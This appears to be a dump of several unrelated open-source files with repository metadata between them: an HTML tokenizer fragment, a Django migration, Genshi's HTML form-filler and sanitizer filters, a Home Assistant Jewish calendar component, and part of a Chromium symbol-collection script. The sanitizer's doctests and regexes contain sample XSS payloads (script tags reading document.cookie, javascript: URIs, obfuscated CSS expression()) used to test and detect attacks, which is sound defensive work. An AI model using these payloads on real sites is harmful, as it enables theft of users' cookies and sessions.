self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def betweenDoctypePublicAndSystemIdentifiersState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypeSystemKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeSystemIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
return True
def beforeDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def doctypeSystemIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypeSystemIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["systemId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["systemId"] += data
return True
def doctypeSystemIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypeSystemIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["systemId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["systemId"] += data
return True
def afterDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.state = self.bogusDoctypeState
return True
def bogusDoctypeState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
# XXX EMIT
self.stream.unget(data)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
pass
return True
def cdataSectionState(self):
data = []
while True:
data.append(self.stream.charsUntil("]"))
data.append(self.stream.charsUntil(">"))
char = self.stream.char()
if char == EOF:
break
else:
assert char == ">"
if data[-1][-2:] == "]]":
data[-1] = data[-1][:-2]
break
else:
data.append(char)
data = "".join(data)
# Deal with null here rather than in the parser
nullCount = data.count("\u0000")
if nullCount > 0:
for i in range(nullCount):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
data = data.replace("\u0000", "\uFFFD")
if data:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": data})
self.state = self.dataState
return True
| mit | -6,652,863,306,430,962,000 | 43.441941 | 109 | 0.529917 | false |
ECastleton/Popstop | popsicle/orders/migrations/0007_auto_20170425_2210.py | 1 | 1295 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-26 04:10
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('orders', '0006_auto_20170424_2037'),
]
operations = [
migrations.AlterModelOptions(
name='flavor',
options={'ordering': ['flavor_name']},
),
migrations.AlterModelOptions(
name='productcategory',
options={'ordering': ['category_name'], 'verbose_name': 'Category', 'verbose_name_plural': 'Categories'},
),
migrations.RemoveField(
model_name='productcategory',
name='flavors',
),
migrations.AddField(
model_name='flavor',
name='category',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='orders.ProductCategory'),
),
migrations.AlterField(
model_name='cateringmenu',
name='end_date',
field=models.DateField(),
),
migrations.AlterField(
model_name='cateringmenu',
name='start_date',
field=models.DateField(),
),
]
| gpl-3.0 | 4,351,846,753,906,317,000 | 29.116279 | 121 | 0.56834 | false |
OpenClovis/SAFplus-Availability-Scalability-Platform | src/ide/genshi/genshi/filters/html.py | 22 | 22797 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://genshi.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://genshi.edgewall.org/log/.
"""Implementation of a number of stream filters."""
try:
any
except NameError:
from genshi.util import any
import re
from genshi.core import Attrs, QName, stripentities
from genshi.core import END, START, TEXT, COMMENT
__all__ = ['HTMLFormFiller', 'HTMLSanitizer']
__docformat__ = 'restructuredtext en'
class HTMLFormFiller(object):
"""A stream filter that can populate HTML forms from a dictionary of values.
>>> from genshi.input import HTML
>>> html = HTML('''<form>
... <p><input type="text" name="foo" /></p>
... </form>''', encoding='utf-8')
>>> filler = HTMLFormFiller(data={'foo': 'bar'})
>>> print(html | filler)
<form>
<p><input type="text" name="foo" value="bar"/></p>
</form>
"""
# TODO: only select the first radio button, and the first select option
# (if not in a multiple-select)
# TODO: only apply to elements in the XHTML namespace (or no namespace)?
def __init__(self, name=None, id=None, data=None, passwords=False):
"""Create the filter.
:param name: The name of the form that should be populated. If this
parameter is given, only forms where the ``name`` attribute
value matches the parameter are processed.
:param id: The ID of the form that should be populated. If this
parameter is given, only forms where the ``id`` attribute
value matches the parameter are processed.
:param data: The dictionary of form values, where the keys are the names
of the form fields, and the values are the values to fill
in.
:param passwords: Whether password input fields should be populated.
This is off by default for security reasons (for
example, a password may end up in the browser cache)
:note: Changed in 0.5.2: added the `passwords` option
"""
self.name = name
self.id = id
if data is None:
data = {}
self.data = data
self.passwords = passwords
def __call__(self, stream):
"""Apply the filter to the given stream.
:param stream: the markup event stream to filter
"""
in_form = in_select = in_option = in_textarea = False
select_value = option_value = textarea_value = None
option_start = None
option_text = []
no_option_value = False
for kind, data, pos in stream:
if kind is START:
tag, attrs = data
tagname = tag.localname
if tagname == 'form' and (
self.name and attrs.get('name') == self.name or
self.id and attrs.get('id') == self.id or
not (self.id or self.name)):
in_form = True
elif in_form:
if tagname == 'input':
type = attrs.get('type', '').lower()
if type in ('checkbox', 'radio'):
name = attrs.get('name')
if name and name in self.data:
value = self.data[name]
declval = attrs.get('value')
checked = False
if isinstance(value, (list, tuple)):
if declval is not None:
checked = declval in [unicode(v) for v
in value]
else:
checked = any(value)
else:
if declval is not None:
checked = declval == unicode(value)
elif type == 'checkbox':
checked = bool(value)
if checked:
attrs |= [(QName('checked'), 'checked')]
elif 'checked' in attrs:
attrs -= 'checked'
elif type in ('', 'hidden', 'text') \
or type == 'password' and self.passwords:
name = attrs.get('name')
if name and name in self.data:
value = self.data[name]
if isinstance(value, (list, tuple)):
value = value[0]
if value is not None:
attrs |= [
(QName('value'), unicode(value))
]
elif tagname == 'select':
name = attrs.get('name')
if name in self.data:
select_value = self.data[name]
in_select = True
elif tagname == 'textarea':
name = attrs.get('name')
if name in self.data:
textarea_value = self.data.get(name)
if isinstance(textarea_value, (list, tuple)):
textarea_value = textarea_value[0]
in_textarea = True
elif in_select and tagname == 'option':
option_start = kind, data, pos
option_value = attrs.get('value')
if option_value is None:
no_option_value = True
option_value = ''
in_option = True
continue
yield kind, (tag, attrs), pos
elif in_form and kind is TEXT:
if in_select and in_option:
if no_option_value:
option_value += data
option_text.append((kind, data, pos))
continue
elif in_textarea:
continue
yield kind, data, pos
elif in_form and kind is END:
tagname = data.localname
if tagname == 'form':
in_form = False
elif tagname == 'select':
in_select = False
select_value = None
elif in_select and tagname == 'option':
if isinstance(select_value, (tuple, list)):
selected = option_value in [unicode(v) for v
in select_value]
else:
selected = option_value == unicode(select_value)
okind, (tag, attrs), opos = option_start
if selected:
attrs |= [(QName('selected'), 'selected')]
elif 'selected' in attrs:
attrs -= 'selected'
yield okind, (tag, attrs), opos
if option_text:
for event in option_text:
yield event
in_option = False
no_option_value = False
option_start = option_value = None
option_text = []
elif in_textarea and tagname == 'textarea':
if textarea_value:
yield TEXT, unicode(textarea_value), pos
textarea_value = None
in_textarea = False
yield kind, data, pos
else:
yield kind, data, pos
class HTMLSanitizer(object):
"""A filter that removes potentially dangerous HTML tags and attributes
from the stream.
>>> from genshi import HTML
>>> html = HTML('<div><script>alert(document.cookie)</script></div>', encoding='utf-8')
>>> print(html | HTMLSanitizer())
<div/>
The default set of safe tags and attributes can be modified when the filter
is instantiated. For example, to allow inline ``style`` attributes, the
following instantation would work:
>>> html = HTML('<div style="background: #000"></div>', encoding='utf-8')
>>> sanitizer = HTMLSanitizer(safe_attrs=HTMLSanitizer.SAFE_ATTRS | set(['style']))
>>> print(html | sanitizer)
<div style="background: #000"/>
Note that even in this case, the filter *does* attempt to remove dangerous
constructs from style attributes:
>>> html = HTML('<div style="background: url(javascript:void); color: #000"></div>', encoding='utf-8')
>>> print(html | sanitizer)
<div style="color: #000"/>
This handles HTML entities, unicode escapes in CSS and Javascript text, as
well as a lot of other things. However, the style tag is still excluded by
default because it is very hard for such sanitizing to be completely safe,
especially considering how much error recovery current web browsers perform.
It also does some basic filtering of CSS properties that may be used for
typical phishing attacks. For more sophisticated filtering, this class
provides a couple of hooks that can be overridden in sub-classes.
:warn: Note that this special processing of CSS is currently only applied to
style attributes, **not** style elements.
"""
SAFE_TAGS = frozenset(['a', 'abbr', 'acronym', 'address', 'area', 'b',
'big', 'blockquote', 'br', 'button', 'caption', 'center', 'cite',
'code', 'col', 'colgroup', 'dd', 'del', 'dfn', 'dir', 'div', 'dl', 'dt',
'em', 'fieldset', 'font', 'form', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
'hr', 'i', 'img', 'input', 'ins', 'kbd', 'label', 'legend', 'li', 'map',
'menu', 'ol', 'optgroup', 'option', 'p', 'pre', 'q', 's', 'samp',
'select', 'small', 'span', 'strike', 'strong', 'sub', 'sup', 'table',
'tbody', 'td', 'textarea', 'tfoot', 'th', 'thead', 'tr', 'tt', 'u',
'ul', 'var'])
SAFE_ATTRS = frozenset(['abbr', 'accept', 'accept-charset', 'accesskey',
'action', 'align', 'alt', 'axis', 'bgcolor', 'border', 'cellpadding',
'cellspacing', 'char', 'charoff', 'charset', 'checked', 'cite', 'class',
'clear', 'cols', 'colspan', 'color', 'compact', 'coords', 'datetime',
'dir', 'disabled', 'enctype', 'for', 'frame', 'headers', 'height',
'href', 'hreflang', 'hspace', 'id', 'ismap', 'label', 'lang',
'longdesc', 'maxlength', 'media', 'method', 'multiple', 'name',
'nohref', 'noshade', 'nowrap', 'prompt', 'readonly', 'rel', 'rev',
'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', 'size',
'span', 'src', 'start', 'summary', 'tabindex', 'target', 'title',
'type', 'usemap', 'valign', 'value', 'vspace', 'width'])
SAFE_CSS = frozenset([
# CSS 3 properties <http://www.w3.org/TR/CSS/#properties>
'background', 'background-attachment', 'background-color',
'background-image', 'background-position', 'background-repeat',
'border', 'border-bottom', 'border-bottom-color',
'border-bottom-style', 'border-bottom-width', 'border-collapse',
'border-color', 'border-left', 'border-left-color',
'border-left-style', 'border-left-width', 'border-right',
'border-right-color', 'border-right-style', 'border-right-width',
'border-spacing', 'border-style', 'border-top', 'border-top-color',
'border-top-style', 'border-top-width', 'border-width', 'bottom',
'caption-side', 'clear', 'clip', 'color', 'content',
'counter-increment', 'counter-reset', 'cursor', 'direction', 'display',
'empty-cells', 'float', 'font', 'font-family', 'font-size',
'font-style', 'font-variant', 'font-weight', 'height', 'left',
'letter-spacing', 'line-height', 'list-style', 'list-style-image',
'list-style-position', 'list-style-type', 'margin', 'margin-bottom',
'margin-left', 'margin-right', 'margin-top', 'max-height', 'max-width',
'min-height', 'min-width', 'opacity', 'orphans', 'outline',
'outline-color', 'outline-style', 'outline-width', 'overflow',
'padding', 'padding-bottom', 'padding-left', 'padding-right',
'padding-top', 'page-break-after', 'page-break-before',
'page-break-inside', 'quotes', 'right', 'table-layout',
'text-align', 'text-decoration', 'text-indent', 'text-transform',
'top', 'unicode-bidi', 'vertical-align', 'visibility', 'white-space',
'widows', 'width', 'word-spacing', 'z-index',
])
SAFE_SCHEMES = frozenset(['file', 'ftp', 'http', 'https', 'mailto', None])
URI_ATTRS = frozenset(['action', 'background', 'dynsrc', 'href', 'lowsrc',
'src'])
def __init__(self, safe_tags=SAFE_TAGS, safe_attrs=SAFE_ATTRS,
safe_schemes=SAFE_SCHEMES, uri_attrs=URI_ATTRS,
safe_css=SAFE_CSS):
"""Create the sanitizer.
The exact set of allowed elements and attributes can be configured.
:param safe_tags: a set of tag names that are considered safe
:param safe_attrs: a set of attribute names that are considered safe
:param safe_schemes: a set of URI schemes that are considered safe
:param uri_attrs: a set of names of attributes that contain URIs
"""
self.safe_tags = safe_tags
# The set of tag names that are considered safe.
self.safe_attrs = safe_attrs
# The set of attribute names that are considered safe.
self.safe_css = safe_css
# The set of CSS properties that are considered safe.
self.uri_attrs = uri_attrs
# The set of names of attributes that may contain URIs.
self.safe_schemes = safe_schemes
# The set of URI schemes that are considered safe.
# IE6 <http://heideri.ch/jso/#80>
_EXPRESSION_SEARCH = re.compile(u"""
[eE
\uFF25 # FULLWIDTH LATIN CAPITAL LETTER E
\uFF45 # FULLWIDTH LATIN SMALL LETTER E
]
[xX
\uFF38 # FULLWIDTH LATIN CAPITAL LETTER X
\uFF58 # FULLWIDTH LATIN SMALL LETTER X
]
[pP
\uFF30 # FULLWIDTH LATIN CAPITAL LETTER P
\uFF50 # FULLWIDTH LATIN SMALL LETTER P
]
[rR
\u0280 # LATIN LETTER SMALL CAPITAL R
\uFF32 # FULLWIDTH LATIN CAPITAL LETTER R
\uFF52 # FULLWIDTH LATIN SMALL LETTER R
]
[eE
\uFF25 # FULLWIDTH LATIN CAPITAL LETTER E
\uFF45 # FULLWIDTH LATIN SMALL LETTER E
]
[sS
\uFF33 # FULLWIDTH LATIN CAPITAL LETTER S
\uFF53 # FULLWIDTH LATIN SMALL LETTER S
]{2}
[iI
\u026A # LATIN LETTER SMALL CAPITAL I
\uFF29 # FULLWIDTH LATIN CAPITAL LETTER I
\uFF49 # FULLWIDTH LATIN SMALL LETTER I
]
[oO
\uFF2F # FULLWIDTH LATIN CAPITAL LETTER O
\uFF4F # FULLWIDTH LATIN SMALL LETTER O
]
[nN
\u0274 # LATIN LETTER SMALL CAPITAL N
\uFF2E # FULLWIDTH LATIN CAPITAL LETTER N
\uFF4E # FULLWIDTH LATIN SMALL LETTER N
]
""", re.VERBOSE).search
# IE6 <http://openmya.hacker.jp/hasegawa/security/expression.txt>
# 7) Particular bit of Unicode characters
_URL_FINDITER = re.compile(
u'[Uu][Rr\u0280][Ll\u029F]\s*\(([^)]+)').finditer
def __call__(self, stream):
"""Apply the filter to the given stream.
:param stream: the markup event stream to filter
"""
waiting_for = None
for kind, data, pos in stream:
if kind is START:
if waiting_for:
continue
tag, attrs = data
if not self.is_safe_elem(tag, attrs):
waiting_for = tag
continue
new_attrs = []
for attr, value in attrs:
value = stripentities(value)
if attr not in self.safe_attrs:
continue
elif attr in self.uri_attrs:
# Don't allow URI schemes such as "javascript:"
if not self.is_safe_uri(value):
continue
elif attr == 'style':
# Remove dangerous CSS declarations from inline styles
decls = self.sanitize_css(value)
if not decls:
continue
value = '; '.join(decls)
new_attrs.append((attr, value))
yield kind, (tag, Attrs(new_attrs)), pos
elif kind is END:
tag = data
if waiting_for:
if waiting_for == tag:
waiting_for = None
else:
yield kind, data, pos
elif kind is not COMMENT:
if not waiting_for:
yield kind, data, pos
def is_safe_css(self, propname, value):
"""Determine whether the given css property declaration is to be
considered safe for inclusion in the output.
:param propname: the CSS property name
:param value: the value of the property
:return: whether the property value should be considered safe
:rtype: bool
:since: version 0.6
"""
if propname not in self.safe_css:
return False
if propname.startswith('margin') and '-' in value:
# Negative margins can be used for phishing
return False
return True
def is_safe_elem(self, tag, attrs):
"""Determine whether the given element should be considered safe for
inclusion in the output.
:param tag: the tag name of the element
:type tag: QName
:param attrs: the element attributes
:type attrs: Attrs
:return: whether the element should be considered safe
:rtype: bool
:since: version 0.6
"""
if tag not in self.safe_tags:
return False
if tag.localname == 'input':
input_type = attrs.get('type', '').lower()
if input_type == 'password':
return False
return True
def is_safe_uri(self, uri):
"""Determine whether the given URI is to be considered safe for
inclusion in the output.
The default implementation checks whether the scheme of the URI is in
the set of allowed URIs (`safe_schemes`).
>>> sanitizer = HTMLSanitizer()
>>> sanitizer.is_safe_uri('http://example.org/')
True
>>> sanitizer.is_safe_uri('javascript:alert(document.cookie)')
False
:param uri: the URI to check
:return: `True` if the URI can be considered safe, `False` otherwise
:rtype: `bool`
:since: version 0.4.3
"""
if '#' in uri:
uri = uri.split('#', 1)[0] # Strip out the fragment identifier
if ':' not in uri:
return True # This is a relative URI
chars = [char for char in uri.split(':', 1)[0] if char.isalnum()]
return ''.join(chars).lower() in self.safe_schemes
def sanitize_css(self, text):
"""Remove potentially dangerous property declarations from CSS code.
In particular, properties using the CSS ``url()`` function with a scheme
that is not considered safe are removed:
>>> sanitizer = HTMLSanitizer()
>>> sanitizer.sanitize_css(u'''
... background: url(javascript:alert("foo"));
... color: #000;
... ''')
[u'color: #000']
Also, the proprietary Internet Explorer function ``expression()`` is
always stripped:
>>> sanitizer.sanitize_css(u'''
... background: #fff;
... color: #000;
... width: e/**/xpression(alert("foo"));
... ''')
[u'background: #fff', u'color: #000']
:param text: the CSS text; this is expected to be `unicode` and to not
contain any character or numeric references
:return: a list of declarations that are considered safe
:rtype: `list`
:since: version 0.4.3
"""
decls = []
text = self._strip_css_comments(self._replace_unicode_escapes(text))
for decl in text.split(';'):
decl = decl.strip()
if not decl:
continue
try:
propname, value = decl.split(':', 1)
except ValueError:
continue
if not self.is_safe_css(propname.strip().lower(), value.strip()):
continue
is_evil = False
if self._EXPRESSION_SEARCH(value):
is_evil = True
for match in self._URL_FINDITER(value):
if not self.is_safe_uri(match.group(1)):
is_evil = True
break
if not is_evil:
decls.append(decl.strip())
return decls
_NORMALIZE_NEWLINES = re.compile(r'\r\n').sub
_UNICODE_ESCAPE = re.compile(
r"""\\([0-9a-fA-F]{1,6})\s?|\\([^\r\n\f0-9a-fA-F'"{};:()#*])""",
re.UNICODE).sub
def _replace_unicode_escapes(self, text):
def _repl(match):
t = match.group(1)
if t:
return unichr(int(t, 16))
t = match.group(2)
if t == '\\':
return r'\\'
else:
return t
return self._UNICODE_ESCAPE(_repl, self._NORMALIZE_NEWLINES('\n', text))
_CSS_COMMENTS = re.compile(r'/\*.*?\*/').sub
def _strip_css_comments(self, text):
return self._CSS_COMMENTS('', text)
| gpl-2.0 | 130,162,049,564,573,860 | 41.060886 | 106 | 0.512787 | false |
pschmitt/home-assistant | homeassistant/components/jewish_calendar/__init__.py | 7 | 4146 | """The jewish_calendar component."""
import logging
import hdate
import voluptuous as vol
from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.discovery import async_load_platform
_LOGGER = logging.getLogger(__name__)
DOMAIN = "jewish_calendar"
SENSOR_TYPES = {
"binary": {
"issur_melacha_in_effect": ["Issur Melacha in Effect", "mdi:power-plug-off"]
},
"data": {
"date": ["Date", "mdi:judaism"],
"weekly_portion": ["Parshat Hashavua", "mdi:book-open-variant"],
"holiday": ["Holiday", "mdi:calendar-star"],
"omer_count": ["Day of the Omer", "mdi:counter"],
"daf_yomi": ["Daf Yomi", "mdi:book-open-variant"],
},
"time": {
"first_light": ["Alot Hashachar", "mdi:weather-sunset-up"],
"talit": ["Talit and Tefillin", "mdi:calendar-clock"],
"gra_end_shma": ['Latest time for Shma Gr"a', "mdi:calendar-clock"],
"mga_end_shma": ['Latest time for Shma MG"A', "mdi:calendar-clock"],
"gra_end_tfila": ['Latest time for Tefilla MG"A', "mdi:calendar-clock"],
"mga_end_tfila": ['Latest time for Tefilla Gr"a', "mdi:calendar-clock"],
"big_mincha": ["Mincha Gedola", "mdi:calendar-clock"],
"small_mincha": ["Mincha Ketana", "mdi:calendar-clock"],
"plag_mincha": ["Plag Hamincha", "mdi:weather-sunset-down"],
"sunset": ["Shkia", "mdi:weather-sunset"],
"first_stars": ["T'set Hakochavim", "mdi:weather-night"],
"upcoming_shabbat_candle_lighting": [
"Upcoming Shabbat Candle Lighting",
"mdi:candle",
],
"upcoming_shabbat_havdalah": ["Upcoming Shabbat Havdalah", "mdi:weather-night"],
"upcoming_candle_lighting": ["Upcoming Candle Lighting", "mdi:candle"],
"upcoming_havdalah": ["Upcoming Havdalah", "mdi:weather-night"],
},
}
CONF_DIASPORA = "diaspora"
CONF_LANGUAGE = "language"
CONF_CANDLE_LIGHT_MINUTES = "candle_lighting_minutes_before_sunset"
CONF_HAVDALAH_OFFSET_MINUTES = "havdalah_minutes_after_sunset"
CANDLE_LIGHT_DEFAULT = 18
DEFAULT_NAME = "Jewish Calendar"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_DIASPORA, default=False): cv.boolean,
vol.Inclusive(CONF_LATITUDE, "coordinates"): cv.latitude,
vol.Inclusive(CONF_LONGITUDE, "coordinates"): cv.longitude,
vol.Optional(CONF_LANGUAGE, default="english"): vol.In(
["hebrew", "english"]
),
vol.Optional(
CONF_CANDLE_LIGHT_MINUTES, default=CANDLE_LIGHT_DEFAULT
): int,
# Default of 0 means use 8.5 degrees / 'three_stars' time.
vol.Optional(CONF_HAVDALAH_OFFSET_MINUTES, default=0): int,
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up the Jewish Calendar component."""
name = config[DOMAIN][CONF_NAME]
language = config[DOMAIN][CONF_LANGUAGE]
latitude = config[DOMAIN].get(CONF_LATITUDE, hass.config.latitude)
longitude = config[DOMAIN].get(CONF_LONGITUDE, hass.config.longitude)
diaspora = config[DOMAIN][CONF_DIASPORA]
candle_lighting_offset = config[DOMAIN][CONF_CANDLE_LIGHT_MINUTES]
havdalah_offset = config[DOMAIN][CONF_HAVDALAH_OFFSET_MINUTES]
location = hdate.Location(
latitude=latitude,
longitude=longitude,
timezone=hass.config.time_zone,
diaspora=diaspora,
)
hass.data[DOMAIN] = {
"location": location,
"name": name,
"language": language,
"candle_lighting_offset": candle_lighting_offset,
"havdalah_offset": havdalah_offset,
"diaspora": diaspora,
}
hass.async_create_task(async_load_platform(hass, "sensor", DOMAIN, {}, config))
hass.async_create_task(
async_load_platform(hass, "binary_sensor", DOMAIN, {}, config)
)
return True
| apache-2.0 | -5,895,185,876,142,505,000 | 35.368421 | 88 | 0.616498 | false |
imply/chuu | tools/find_runtime_symbols/prepare_symbol_info.py | 24 | 8217 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import hashlib
import json
import logging
import os
import re
import shutil
import subprocess
import sys
import tempfile
from proc_maps import ProcMaps
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
REDUCE_DEBUGLINE_PATH = os.path.join(BASE_PATH, 'reduce_debugline.py')
LOGGER = logging.getLogger('prepare_symbol_info')
def _dump_command_result(command, output_dir_path, basename, suffix):
handle_out, filename_out = tempfile.mkstemp(
suffix=suffix, prefix=basename + '.', dir=output_dir_path)
handle_err, filename_err = tempfile.mkstemp(
suffix=suffix + '.err', prefix=basename + '.', dir=output_dir_path)
error = False
try:
subprocess.check_call(
command, stdout=handle_out, stderr=handle_err, shell=True)
except (OSError, subprocess.CalledProcessError):
error = True
finally:
os.close(handle_err)
os.close(handle_out)
if os.path.exists(filename_err):
if LOGGER.getEffectiveLevel() <= logging.DEBUG:
with open(filename_err, 'r') as f:
for line in f:
LOGGER.debug(line.rstrip())
os.remove(filename_err)
if os.path.exists(filename_out) and (
os.path.getsize(filename_out) == 0 or error):
os.remove(filename_out)
return None
if not os.path.exists(filename_out):
return None
return filename_out
def prepare_symbol_info(maps_path,
output_dir_path=None,
alternative_dirs=None,
use_tempdir=False,
use_source_file_name=False):
"""Prepares (collects) symbol information files for find_runtime_symbols.
1) If |output_dir_path| is specified, it tries collecting symbol information
files in the given directory |output_dir_path|.
1-a) If |output_dir_path| doesn't exist, create the directory and use it.
1-b) If |output_dir_path| is an empty directory, use it.
1-c) If |output_dir_path| is a directory which has 'files.json', assumes that
files are already collected and just ignores it.
1-d) Otherwise, depends on |use_tempdir|.
2) If |output_dir_path| is not specified, it tries to create a new directory
depending on 'maps_path'.
If it cannot create a new directory, creates a temporary directory depending
on |use_tempdir|. If |use_tempdir| is False, returns None.
Args:
maps_path: A path to a file which contains '/proc/<pid>/maps'.
alternative_dirs: A mapping from a directory '/path/on/target' where the
target process runs to a directory '/path/on/host' where the script
reads the binary. Considered to be used for Android binaries.
output_dir_path: A path to a directory where files are prepared.
use_tempdir: If True, it creates a temporary directory when it cannot
create a new directory.
use_source_file_name: If True, it adds reduced result of 'readelf -wL'
to find source file names.
Returns:
A pair of a path to the prepared directory and a boolean representing
if it created a temporary directory or not.
"""
alternative_dirs = alternative_dirs or {}
if not output_dir_path:
matched = re.match('^(.*)\.maps$', os.path.basename(maps_path))
if matched:
output_dir_path = matched.group(1) + '.pre'
if not output_dir_path:
matched = re.match('^/proc/(.*)/maps$', os.path.realpath(maps_path))
if matched:
output_dir_path = matched.group(1) + '.pre'
if not output_dir_path:
output_dir_path = os.path.basename(maps_path) + '.pre'
# TODO(dmikurube): Find another candidate for output_dir_path.
used_tempdir = False
LOGGER.info('Data for profiling will be collected in "%s".' % output_dir_path)
if os.path.exists(output_dir_path):
if os.path.isdir(output_dir_path) and not os.listdir(output_dir_path):
LOGGER.warn('Using an empty existing directory "%s".' % output_dir_path)
else:
LOGGER.warn('A file or a directory exists at "%s".' % output_dir_path)
if os.path.exists(os.path.join(output_dir_path, 'files.json')):
LOGGER.warn('Using the existing directory "%s".' % output_dir_path)
return output_dir_path, used_tempdir
else:
if use_tempdir:
output_dir_path = tempfile.mkdtemp()
used_tempdir = True
LOGGER.warn('Using a temporary directory "%s".' % output_dir_path)
else:
LOGGER.warn('The directory "%s" is not available.' % output_dir_path)
return None, used_tempdir
else:
LOGGER.info('Creating a new directory "%s".' % output_dir_path)
try:
os.mkdir(output_dir_path)
except OSError:
LOGGER.warn('A directory "%s" cannot be created.' % output_dir_path)
if use_tempdir:
output_dir_path = tempfile.mkdtemp()
used_tempdir = True
LOGGER.warn('Using a temporary directory "%s".' % output_dir_path)
else:
LOGGER.warn('The directory "%s" is not available.' % output_dir_path)
return None, used_tempdir
shutil.copyfile(maps_path, os.path.join(output_dir_path, 'maps'))
with open(maps_path, mode='r') as f:
maps = ProcMaps.load(f)
LOGGER.debug('Listing up symbols.')
files = {}
for entry in maps.iter(ProcMaps.executable):
LOGGER.debug(' %016x-%016x +%06x %s' % (
entry.begin, entry.end, entry.offset, entry.name))
binary_path = entry.name
for target_path, host_path in alternative_dirs.iteritems():
if entry.name.startswith(target_path):
binary_path = entry.name.replace(target_path, host_path, 1)
nm_filename = _dump_command_result(
'nm -n --format bsd %s | c++filt' % binary_path,
output_dir_path, os.path.basename(binary_path), '.nm')
if not nm_filename:
continue
readelf_e_filename = _dump_command_result(
